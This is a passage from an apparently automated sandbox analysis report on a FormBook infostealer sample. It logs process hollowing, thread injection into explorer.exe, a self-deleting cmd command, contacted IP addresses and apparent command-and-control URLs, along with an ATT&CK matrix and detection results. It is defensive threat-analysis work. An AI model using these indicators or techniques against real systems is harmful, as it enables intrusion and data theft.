          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.253.73.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.213.108.250 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.224.206.45 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.76.239 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 92.249.45.191 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeSection loaded: unknown target: C:\Users\user\Desktop\lpdKSOB78u.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1330000
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: explorer.exe, 00000004.00000000.214145154.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.229364456.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356515 Sample: lpdKSOB78u.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 33 www.havemercyinc.net 2->33 35 havemercyinc.net 2->35 37 www.larek.store 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 11 lpdKSOB78u.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\h1luljvls0ea.dll, PE32 11->29 dropped 31 C:\Users\user\AppData\Local\...\System.dll, PE32 11->31 dropped 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 15 lpdKSOB78u.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 39 www.pcareinc.com 154.213.108.250, 49713, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 18->39 41 buildassetswealth.com 34.102.136.180, 49740, 49747, 49752 GOOGLEUS United States 18->41 43 17 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 22 raserver.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          lpdKSOB78u.exe44%VirustotalBrowse
          lpdKSOB78u.exe36%ReversingLabsWin32.Trojan.Convagent
          lpdKSOB78u.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll22%ReversingLabsWin32.Trojan.Convagent
          C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.lpdKSOB78u.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.lpdKSOB78u.exe.2a30000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.lpdKSOB78u.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.lpdKSOB78u.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.lpdKSOB78u.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.lpdKSOB78u.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.buildassetswealth.com/4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha0%Avira URL Cloudsafe
          http://www.inbarrel.com/4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/pics/27587/Left.png)0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.antips.com/4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/27587/Right.png)0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff20%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          www.torontotel.com/4qdc/0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)0%Avira URL Cloudsafe
          http://rdfs.org/sioc/ns#0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.39palmavenue.com/4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha0%Avira URL Cloudsafe
